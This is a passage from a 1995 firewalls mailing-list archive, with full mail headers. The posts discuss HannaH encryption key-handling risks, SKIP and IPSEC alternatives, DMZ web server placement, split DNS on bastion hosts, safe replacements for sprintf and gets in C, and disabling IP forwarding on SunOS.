Solaris (which wont do you much good if you are running windows) is freely available now and documentation of SKIP is available at http://skip.incog.com. You would need to check out the ipsec list to find out about other alternatives. geoff From firewalls-owner Fri Sep 1 12:50:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09894 for firewalls-outgoing; Fri, 1 Sep 1995 11:44:01 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA09880 for ; Fri, 1 Sep 1995 11:43:57 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA25284; Fri, 1 Sep 1995 11:42:17 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08418; Fri, 1 Sep 1995 12:42:20 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07846; Fri, 1 Sep 1995 12:42:20 -0600 Message-Id: <9509011842.AA07846@future.incog.com> To: gary flynn Cc: mulligan@incog.com, firewalls-digest@GreatCircle.COM, shields@yage.tembel.org Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 14:08:47 EDT." <199509011816.LAA24628@incog.com> Date: Fri, 01 Sep 1995 12:42:20 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary wrote: > True, it has some limitations. Some will be solved, some may not. But > for our users of mainline applications, it seems to cover the bases > pretty well. So for you, in your specific environment, it may be an OK solution. There have been a number of concerns raised, though. > The bulk of our machines are PCs. I probably should have made that > clear. Again for your environment it may work, but what about the other systems that your PC users may want to communicate with securely. You need interoperability. > > > The "certificate diskette" is yet another potential problem. Since the > > private key is decrypted off the disk and stored in the end system it is > > available to be read by anything running on system (especially on PCs) > > and when the diskette is removed does the private key get removed or > > does the system maintain its identity/Distingushed Name. It can't check > > for the presence of the diskette on every packet or it would be too slow > > to be usable. In addition the private key (though encrypted) on the > > certificate diskette is copyable. > > > > I'd put this in the class of "please remember to logoff the system > when you are done and before leaving your terminal/PC". The user > needs to "unsecure" the desktop before leaving. This may imply > turning it off or Hannah may have some procedure to "unauthenticate". > The diskette is a threat but physical security addresses that. No the threat is also that if I can copy your diskette and guess or bute force your password (users always use good passwords) or I can grab the decypted private key from the PC itself then I can become you. Obviously if you think that it meets your needs (as you seem to) then use it. geoff From firewalls-owner Fri Sep 1 13:00:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11548 for firewalls-outgoing; Fri, 1 Sep 1995 12:14:03 -0700 Received: from eros.britain.eu.net (eros.Britain.EU.net [192.91.199.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA11538 for ; Fri, 1 Sep 1995 12:13:58 -0700 Received: from airtechsms.co.uk by eros.britain.eu.net with UUCP id ; Fri, 1 Sep 1995 19:57:00 +0100 Received: by airtechsms.co.uk (Smail3.1.28.1 #1) id m0soRBf-00000jC; Fri, 1 Sep 95 09:10 BST Date: Fri, 1 Sep 1995 09:10:54 +0100 (BST) From: Martin Hepworth X-Sender: max@airtechs To: Alex Sharpe cc: "'firewalls-owner'" Subject: Re: Placement of WWW Server - any thoughts? In-Reply-To: <3044F9DE@bass.rssi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 30 Aug 1995, Alex Sharpe wrote: > > We are installing a Web Server that we want to give the world access to, but > are not sure of our security architecture yet. We are kicking around > several ideas including the idea of only allowing HTTP to pass through our > FIREWALL if it is destined for the Web server. We are considering doing > this by filtering on the Web Server's IP address and HTTP port number. > > What do you think? What are the residual risks? > > Alex.Sharpe@rssi.com > The 'normal' and most secure place to put your W3 server is in the DMZ that way no HTTP stuff comes into your network, unless you've someone on the inside surfing. That's also the best? place to put any ftp server -- if it doesn't need to be on your side of the firewall don't put it there! MGH ------------------------------------------------------------------ Martin Hepworth, email work: max@airtechsms.co.uk Racal-Airtech, UK email home: mgh@cityscape.co.uk Voice: +44(0)1844 201800 http://www.gold.net/users/ef67/ FAX: +44(0)1844 201832 PGP Key on request All opinions are mine, mine, all mine................ From firewalls-owner Fri Sep 1 13:02:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09897 for firewalls-outgoing; Fri, 1 Sep 1995 11:44:03 -0700 Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA09885 for ; Fri, 1 Sep 1995 11:43:58 -0700 From: mulligan@future.incog.com Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA25286; Fri, 1 Sep 1995 11:42:17 -0700 Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08419; Fri, 1 Sep 1995 12:42:22 -0600 Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07852; Fri, 1 Sep 1995 12:42:22 -0600 Message-Id: <9509011842.AA07852@future.incog.com> To: gary flynn Cc: mulligan@incog.com, firewalls-digest@GreatCircle.COM, shields@yage.tembel.org Subject: Re: HannaH from SecureWare Inc. Reply-To: mulligan@incog.com In-Reply-To: Your message of "Fri, 01 Sep 1995 14:08:47 EDT." <199509011816.LAA24628@incog.com> Date: Fri, 01 Sep 1995 12:42:22 -0600 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Gary wrote: > True, it has some limitations. Some will be solved, some may not. But > for our users of mainline applications, it seems to cover the bases > pretty well. So for you, in your specific environment, it may be an OK solution. There have been a number of concerns raised, though. > The bulk of our machines are PCs. I probably should have made that > clear. Again for your environment it may work, but what about the other systems that your PC users may want to communicate with securely. You need interoperability. > > > The "certificate diskette" is yet another potential problem. Since the > > private key is decrypted off the disk and stored in the end system it is > > available to be read by anything running on system (especially on PCs) > > and when the diskette is removed does the private key get removed or > > does the system maintain its identity/Distingushed Name. It can't check > > for the presence of the diskette on every packet or it would be too slow > > to be usable. In addition the private key (though encrypted) on the > > certificate diskette is copyable. > > > > I'd put this in the class of "please remember to logoff the system > when you are done and before leaving your terminal/PC". The user > needs to "unsecure" the desktop before leaving. This may imply > turning it off or Hannah may have some procedure to "unauthenticate". > The diskette is a threat but physical security addresses that. No the threat is also that if I can copy your diskette and guess or bute force your password (users always use good passwords) or I can grab the decypted private key from the PC itself then I can become you. Obviously if you think that it meets your needs (as you seem to) then use it. geoff From firewalls-owner Fri Sep 1 13:09:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10349 for firewalls-outgoing; Fri, 1 Sep 1995 11:54:13 -0700 Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA10342; Fri, 1 Sep 1995 11:54:08 -0700 Message-Id: <199509011854.LAA10342@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA012271077; Fri, 1 Sep 1995 14:44:37 -0400 Date: Fri, 1 Sep 1995 14:44:37 -0400 From: gary flynn To: mulligan@incog.com Subject: Re: HannaH from SecureWare Inc. Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, isdmill@gatekeeper.ddp.state.me.us, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > From mulligan@future.incog.com Fri Sep 1 14:23 EDT 1995 > Gary wrote: > > Hannah is centrally administered although you have to install the > > product on all the platforms. So there is a central security > > administrator. Software distribution, installation, and configuration > > managment mechanisms and policies need to exist for network/node > > management anyway, so the addition of one more product shouldn't > > negate the overall concept. > > Oh and this points to another potential problem, they have combined the > administrative system with the Certification Authority. This is very > very bad. The CA is the box that holds the very sensitive CA private > key and having this box on the network just begs to have that key > compromised - then anyone and everyone can sign certificates saying > they are anyone. All security is lost, the war is lost, the count is 10 > and your out. > The Hannah documents indicate that the management workstation and certificate authority are two different machines. > Key management/negotiation overhead is another very critical issue. > Their document doesn't mention the protocol used to do this negotiation. > What about support for different encryption mechanisms. > > In addition I haven't heard anything about the actual protocols. They > certainly aren't open and publically available. What about > interoperability with other systems. They don't seems to be talking > with any standards groups. > > On the other hand there are systems being developed and available that > provide much the same functionality (end to end encryption and > authentication) without some of the drawbacks (key management overhead, > lack of support to multiple encryption techniques, private/closed > proprietary protocol, lack of multi-protocol support) such as SKIP and > others being worked on in the IPSEC working group. > Do products exist? Where can I find more information on these? thanks, gary From firewalls-owner Fri Sep 1 13:30:13 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15706 for firewalls-outgoing; Fri, 1 Sep 1995 13:04:57 -0700 Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA15693 for ; Fri, 1 Sep 1995 13:04:53 -0700 Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA21750; Fri, 1 Sep 1995 16:00:01 +0500 Received: from cc:Mail by smtpinet.aspensys.com id AA809996857 Fri, 01 Sep 95 16:07:37 EST Date: Fri, 01 Sep 95 16:07:37 EST From: jmeritt@smtpinet.aspensys.com (Meritt, Jim) Message-Id: <9508018099.AA809996857@smtpinet.aspensys.com> Cc: firewalls@greatcircle.com Subject: how to close socket content-length: 147 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On a standard sun box using /etc/services and inetd, how would you stop traffic from being passed through a port? Jim Meritt From firewalls-owner Fri Sep 1 13:36:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17446 for firewalls-outgoing; Fri, 1 Sep 1995 13:19:52 -0700 Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA17427 for ; Fri, 1 Sep 1995 13:19:47 -0700 Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA06995 ; Fri, 1 Sep 95 16:18:23 -0400 Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Fri, 1 Sep 95 15:54 EDT Message-Id: Subject: Re: HannaH from SecureWare Inc. To: firewalls@greatcircle.com Date: Fri, 1 Sep 1995 15:54:00 -0400 (EDT) From: "Michael H. Warfield" In-Reply-To: <9509011907.AA07943@future.incog.com> from "mulligan@future.incog.com" at Sep 1, 95 01:07:47 pm X-Mailer: ELM [version 2.4 PL20] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1205 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mulligan@future.incog.com enscribed thusly: > Gary wrote: > > The Hannah documents indicate that the management workstation and > > certificate authority are two different machines. > Actually it says that the CA and management gui are separate > applications and it just so happens that today you must run the CA on > Windows95 and the management gui on HPUX or SCO. WHAT?!?!?! The CA must run on Windows 95!?!?! Well there goes any chance of any security what so ever! Somebody must be absolutely dreaming to place any security product on Windows 95. I MIGHT accept windows NT. At least that does have security features, even if they are untried and have not yet stood the test of time. To place a critical piece of security code on Windows 95, an aledged operating system riddled with bugs by Microsoft's own admission, is shear insanity! My interest in this product is now total history! > geoff -- Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From firewalls-owner Fri Sep 1 16:00:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24288 for firewalls-outgoing; Fri, 1 Sep 1995 15:43:04 -0700 Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA24281 for ; Fri, 1 Sep 1995 15:43:00 -0700 Received: by colin.muc.de via suspension id <41450-2>; Sat, 2 Sep 1995 00:41:12 +0200 Received: from en by colin.muc.de with UUCP id <41447-2>; Fri, 1 Sep 1995 23:33:53 +0200 Received: by en.muc.de (Sendmail5.67a8/IDA-1.5) id AA00587; Fri, 1 Sep 1995 09:50:24 +0200 Date: Fri, 1 Sep 1995 09:50:24 +0200 From: "Ralf S. Engelschall" Message-Id: <199509010750.AA00587@en.muc.de> To: firewalls@greatcircle.com Subject: Re: DNS forwarding problem Newsgroups: sdm.lists.firewalls Organization: Engelschall (EN) Privat, Dachau/Munich, Germany Reply-To: rse@en.muc.de X-Newsreader: TIN [version 1.2 PL2] X-Charset: ASCII X-Char-Esc: 29 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 31 Aug 1995 01:16:55 +0200 in sdm.lists.firewalls you wrote: > [...] > You then configure all your clients INCLUDING THE BASTION/GATEWAY to resolve > using the internal nameserver. > [...] > The really weird part is that when the bastion/gateway wants to resolve an > internet name, it asks the internal, which forwards back to the bastion/gateway > which does the resolution and sends the answer back along the same path. I cannot understand WHY the bastion has to resolve via the internal nameserver. I run my bastion host via a /etc/resolv.conf which points to its local nameserver. And this works fine. The bastion only needs to resolv the name of the internal bastion and this name is in his DNS. Are there any _REAL_ security concerns about resolving the outer bastion host NOT via the internal bastion host? Ralf S. Engelschall rse@en.muc.de http://www.muc.de/~rse From firewalls-owner Fri Sep 1 17:02:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA26994 for firewalls-outgoing; Fri, 1 Sep 1995 16:58:26 -0700 Received: from rudolph.cs.utk.edu (RUDOLPH.CS.UTK.EDU [128.169.92.87]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA26964 for ; Fri, 1 Sep 1995 16:58:20 -0700 Received: from LOCALHOST.cs.utk.edu by rudolph.cs.utk.edu with SMTP (cf v2.11c-UTK) id TAA11927; Fri, 1 Sep 1995 19:56:55 -0400 Message-Id: <199509012356.TAA11927@rudolph.cs.utk.edu> To: firewalls@greatcircle.com Subject: linux vs. *bsd for secure networking system Date: Fri, 01 Sep 1995 19:56:54 -0400 From: Paul McMahan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I know that the linux vs. (free|net)bsd question is the subject of ongoing debates outside the realm of firewalls, but I'm interested specifically in the security aspects of these operating systems. I'm debating about which OS to use on a firewall machine and I need to know specifics about which OS is a better platform for effective security. Please advise. Paul McMahan From firewalls-owner Fri Sep 1 17:09:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA26176 for firewalls-outgoing; Fri, 1 Sep 1995 16:42:32 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA26163 for ; Fri, 1 Sep 1995 16:42:27 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id QAA26096; Fri, 1 Sep 1995 16:40:28 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma026094; Fri Sep 1 16:40:01 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id QAA18381; Fri, 1 Sep 1995 16:37:36 -0700 Date: Fri, 1 Sep 1995 16:37:36 -0700 From: Brian Murrell Message-Id: <199509012337.QAA18381@mocha.bctel.net> To: firewalls@GreatCircle.COM, rse@en.muc.de Subject: Re: DNS forwarding problem X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I cannot understand WHY the bastion has to resolve via the internal > nameserver. I run my bastion host via a /etc/resolv.conf which points to its > local nameserver. And this works fine. The bastion only needs to resolv the > name of the internal bastion and this name is in his DNS. Because typically people who run split DNS do so to hide the internal namespace from the world. Thusly only machines which query the internal DNS (typically internal machines and NOT external machines) can see the internal hosts. By telling the bastion to resolve using the internal nameserver, it sees both the inside world and outside world. It should, as it (and only it) lives in both worlds. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5262 From firewalls-owner Fri Sep 1 19:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29937 for firewalls-outgoing; Fri, 1 Sep 1995 19:01:27 -0700 Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA29930 for ; Fri, 1 Sep 1995 19:01:23 -0700 Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id WAA14456 for Firewalls@GreatCircle.COM; Fri, 1 Sep 1995 22:17:54 -0400 From: "Marcus J. Ranum" Message-Id: <199509020217.WAA14456@switchblade.iwi.com> Subject: snprintf() To: Firewalls@GreatCircle.COM Date: Fri, 1 Sep 1995 22:17:54 -0400 (EDT) Reply-To: mjr@iwi.com Organization: Information Warehouse! Inc, Baltimore, MD URL: mjr's web page Phone: 410-889-8569 Coredump: Infocalypse Now!!! X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 3100 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick Powell writes: >If you want to launch a crusade, then start with the C language programming >books. Eradicate their use of sprintf, sscanf, gets, and other IO functions >that are inherently flawed. If you want to start a crusade, ask rather why people are writing mission critical software in a programming language that is not type or allocation safe, which has virtually no runtime controls, and which requires programmers to manually maintain memory allocation. That's like doing dentistry with a crowbar: you can do it, but it's a sloppy, and somewhat risky tool for spots where you need a delicate touch. The unfortunate fact is that if you want to develop something (like the fwtk) that people can use on common platforms, then it's not likely to be well-recieved if you write it in a safe programming language like Modula-3 or something that would probably produce more robust executables. So C is the language of choice - but let's not kid ourselves that it's the right language. It's the *available* language. For example (believe it or not!) I saberized the toolkit thoroughly, and V1.0 was completely run for quite a while on my Sparc, under the interpreter checking for runtime errors. *BUT* of course you never find them all because some parts of the system don't get stressed enough and even saber-C doesn't check the internals of library routines like syslog(). The formalists[*] hold a particularly rigorous view of the problem. Namely: you should be able to build components on top of other components you trust, which run on an O/S you trust and then we would not have these kinds of little problems. But: who will step forward and do a complete design review of stdio? [Chris, don't answer that!] and who will check Chris' implementation? And who will make sure the vendors all adopt it? And *THEN* there's all the other code and dbm and resolv and -- the list goes on. Who will do the security code review of X11R6? What about MOTIF? I will stop there because I just ate. In the short term, there are some measures we can take but they're draconian. One *could* simply take sprintf() et al out of libc -- that's what shared libraries are for! Or you can replace the program with something that does the right thing. It is instructive to replace system() on your machine with a library routine that calls abort() if it detects that it is running as euid < 100. BSDI machines do this cute thing: . cat > x.c main() { gets(0); } . make x cc -O2 x.c -o x . x warning: this program uses gets(), which is unsafe. ^C . The gets() library routine has been programmed to HUMILIATE itself when you use it! If one's sprintf() did the same thing, it would get fixed pretty quickly as users tired of seeing that crud on their screen. mjr. [*The formalists are an obscure religious sect that is on the verge of exctinction, whose surviving members are mostly in hiding protecting the One Perfect Program, which happens to be a provably correct version of "hello.c" - if you assume the compiler's code generator and optimizer work right.] From firewalls-owner Fri Sep 1 19:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA00686 for firewalls-outgoing; Fri, 1 Sep 1995 19:29:16 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA00672 for ; Fri, 1 Sep 1995 19:29:12 -0700 Received: from montgomery.com by relay1.UU.NET with SMTP id QQzfjt14693; Fri, 1 Sep 1995 22:27:56 -0400 Message-ID: Date: 1 Sep 1995 19:24:39 -0800 From: "Kenneth Kron" Subject: snprintf.c and SunOS 5.4 To: firewalls@GreatCircle.COM, "Patrick Powell" X-Mailer: Mail*Link SMTP-MS 3.0.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Patrick, Thanks for the snprintf source, FYI -- In order to compile your snprintf on SunOS 5.4 I had to #include For anyone else doing this you can either define HAVE_STDARG_H or HAVE_VARARGS_H, both work under SunOS 5.x, of course stdarg.h provides more type checking. Kenneth Kron INS Network Security Consultant kkron@montgomery.com From firewalls-owner Sat Sep 2 07:30:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09565 for firewalls-outgoing; Sat, 2 Sep 1995 07:16:47 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA09558 for ; Sat, 2 Sep 1995 07:16:43 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16782; Sat, 2 Sep 95 09:49:25 -0400 Date: Sat, 2 Sep 95 09:49:24 -0400 Message-Id: <9509021349.AA16782@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: re: snprintf(), SMURF, & Jules Own Version... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mjr rites (Hi Marcus 8*): > If you want to start a crusade, ask rather why people are >writing mission critical software in a programming language that >is not type or allocation safe, which has virtually no runtime >controls, and which requires programmers to manually maintain >memory allocation. Naah, fact is that if companies advertise for C++ programmers, they are not going to get people who understand bounds checking like us Mil-Std-1815 weenies (see: the DoD does have a sense of humour 8*). > The formalists[*] hold a particularly rigorous view of >the problem. Namely: you should be able to build components >on top of other components you trust, which run on an O/S >you trust and then we would not have these kinds of little problems. And then there are those assembly & machine code programmers who do not trust anything they did not write themselves (heck the BIOS on the first IBM PC-ATs did not even meet IBM's own spec and that was less than 64k). >[*The formalists are an obscure religious sect that is on the >verge of exctinction, whose surviving members are mostly in hiding >protecting the One Perfect Program, which happens to be a provably >correct version of "hello.c" - if you assume the compiler's code >generator and optimizer work right.] No assumptions permitted: back in the days of MacDac vs SoftTech when compiler mfrs had real *marketeers* (and hospitality suites at shows 8*) and Mil-Std-1750A was a coprocessor in search of a processor we used to do code checks v/v the same thing in pure assembly. Compilers were actually validated and the source was available (if you had the right contacts at the LCF). Disassemblers were something written in an afternoon (have a printout here somewhere of the 680x program used by the first GM car computers - Delco claimed it was "proprietary" despite being in a million cars). Of course considering what we were paid for, it was "rocket science". Besides a *real* programmer wouldn't bother with hello.c, he/she/it/other would have written a VAX device driver to intercept every print banner, bump up the priority, and insert a picture of Crusader Rabbit *that worked* (maybe 20% of the people who took the VAX "Device Drivers" course could actually write one by the end of the week). Of course now I spend my time trying to figure out why group ID assignments do not work properly when passed to an access server in IOS 10.3 (& creating Rags the Tiger banners that also send an alarm to the admin pager on strobes to port 79 of the router 8*). (ob firewalls) Warmly, Padgett From firewalls-owner Sat Sep 2 09:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10941 for firewalls-outgoing; Sat, 2 Sep 1995 08:44:22 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10934 for ; Sat, 2 Sep 1995 08:44:16 -0700 From: cjolley@iac.net Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16981; Sat, 2 Sep 95 11:42:52 -0400 Date: Sat, 2 Sep 95 11:42:52 -0400 Message-Id: <9509021542.AA16981@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: re: snprintf(), SMURF, & Jules Own Version... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Another group of programmers who spend no time doing bounds checking or worrying about allocation and deallocation of memory are those who write code for an environment where the hardware enforces bounds checking and the operating system handles all the details regarding allocation and deallocation of _all_ system resources. And, since that environment doesn't have (and doesn't need) an assembly language, even the highly skilled system programmers can't code detours around such features. **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** On Sat, 2 Sep 1995 padgett@tccslr.dnet.mmc.com wrote: > mjr rites (Hi Marcus 8*): > > If you want to start a crusade, ask rather why people are > >writing mission critical software in a programming language that > >is not type or allocation safe, which has virtually no runtime > >controls, and which requires programmers to manually maintain > >memory allocation. > > Naah, fact is that if companies advertise for C++ programmers, they are not > going to get people who understand bounds checking like us Mil-Std-1815 > weenies (see: the DoD does have a sense of humour 8*). > > > The formalists[*] hold a particularly rigorous view of > >the problem. Namely: you should be able to build components > >on top of other components you trust, which run on an O/S > >you trust and then we would not have these kinds of little problems. > > And then there are those assembly & machine code programmers who do not > trust anything they did not write themselves (heck the BIOS on the first > IBM PC-ATs did not even meet IBM's own spec and that was less than 64k). > > >[*The formalists are an obscure religious sect that is on the > >verge of exctinction, whose surviving members are mostly in hiding > >protecting the One Perfect Program, which happens to be a provably > >correct version of "hello.c" - if you assume the compiler's code > >generator and optimizer work right.] > > No assumptions permitted: back in the days of MacDac vs SoftTech when > compiler mfrs had real *marketeers* (and hospitality suites at shows 8*) > and Mil-Std-1750A was a coprocessor in search of a processor we used to do > code checks v/v the same thing in pure assembly. Compilers were actually > validated and the source was available (if you had the right contacts at > the LCF). Disassemblers were something written in an afternoon (have a > printout here somewhere of the 680x program used by the first GM car > computers - Delco claimed it was "proprietary" despite being in a million > cars). Of course considering what we were paid for, it was "rocket science". > > Besides a *real* programmer wouldn't bother with hello.c, he/she/it/other > would have written a VAX device driver to intercept every print banner, > bump up the priority, and insert a picture of Crusader Rabbit *that worked* > (maybe 20% of the people who took the VAX "Device Drivers" course could > actually write one by the end of the week). > > Of course now I spend my time trying to figure out why group ID assignments > do not work properly when passed to an access server in IOS 10.3 (& creating > Rags the Tiger banners that also send an alarm to the admin pager on strobes > to port 79 of the router 8*). (ob firewalls) > Warmly, > Padgett > From firewalls-owner Sat Sep 2 10:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11763 for firewalls-outgoing; Sat, 2 Sep 1995 09:40:25 -0700 Received: from roble.com (roble.com [204.188.93.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA11756 for ; Sat, 2 Sep 1995 09:40:22 -0700 Received: by roble.com (4.1/SMI-4.1/roble) id AA10160; Sat, 2 Sep 95 09:38:59 PDT Date: Sat, 2 Sep 1995 09:17:59 -0700 (PDT) From: Roger Marquis Subject: Subject: Re: using suns/sunos for gateway host(s) To: Firewalls@GreatCircle.COM In-Reply-To: <199508301706.KAA28357@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > According to ~The Firewall Book~, things like IP forwarding and IP source > routing should be disabled on gateway hosts used to construct a firewall. > > I called sun tech support, and not surprisingly they didn't have a clue how to > modify the 4.1.3 kernel to acheive this. It's unlikely you spoke with Sun tech support. You probably spoke with an operator. If you had spoke with an engineer they would have given you a service order number. Any Sun engineer could tell you how to disable ip-forwarding, they all have access to Sunsolve. > If anyone could give me some pointers, I'd appreciate it. If you have a Sun support contract, or a Sunsolve CD, search for ip_forwarding. I found detailed procedures for 4.0, 4.1, and 5.x. You might also checkout the "Practical Guide to Solaris Security". It has a number of recommendations you won't find in Bellovin and Cheswick's book. Also, check out ftp://ftp.nec.com/pub/security, ftp://info.cert.org, and ftp://sunsite.unc.edu for more info on SunOS firewalls and utilities like tripwire, tcp_wrappers, npasswd, and cops. Roger Marquis From firewalls-owner Sat Sep 2 11:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13006 for firewalls-outgoing; Sat, 2 Sep 1995 10:39:26 -0700 Received: from wintermute.imsi.com (wintermute.imsi.com [192.103.3.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12999 for ; Sat, 2 Sep 1995 10:39:23 -0700 Received: from relay.imsi.com by wintermute.imsi.com id NAA23728 for ; Sat, 2 Sep 1995 13:38:01 -0400 Received: from lorax.imsi.com by relay.imsi.com id NAA27224 for ; Sat, 2 Sep 1995 13:38:00 -0400 Received: from localhost by lorax.imsi.com (4.1/SMI-4.1) id AA07170; Sat, 2 Sep 95 13:37:59 EDT Resent-Message-Id: <9509021737.AA07170@lorax.imsi.com> Message-Id: <9509021737.AA07170@lorax.imsi.com> To: Ted Stockwell , shields@tembel.org (Michael Shields) Cc: firewalls@greatcircle.com Subject: Re: FW: Programming Reply-To: rens@imsi.com Date: Sat, 02 Sep 1995 13:17:15 -0400 From: Rens Troost Resent-To: firewalls@greatcircle.com Resent-Date: Sat, 02 Sep 1995 13:37:59 -0400 Resent-From: Rens Troost Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Sed: >> In something like allocating memory, where a failure is always fatal, >> you can easily write an xmalloc() that is that a wrapper which either >> returns a non-NULL pointer or dies. Then always call that instead of >> straight malloc(). This is fairly easy. XtMalloc lets you do this by default, and you can override the error behavior to give you more intelligent error handling, although freeing memory afer brk() is always dicey unless you use an expensive heap compaction approach. Xt is great for programming all sorts of things, only a small part of which are windowing apps. -Rens From firewalls-owner Sat Sep 2 12:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA13892 for firewalls-outgoing; Sat, 2 Sep 1995 11:49:44 -0700 Received: from NYC.Heuristicrat.COM (NYC.Heuristicrat.COM [204.242.208.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA13885 for ; Sat, 2 Sep 1995 11:49:40 -0700 Received: 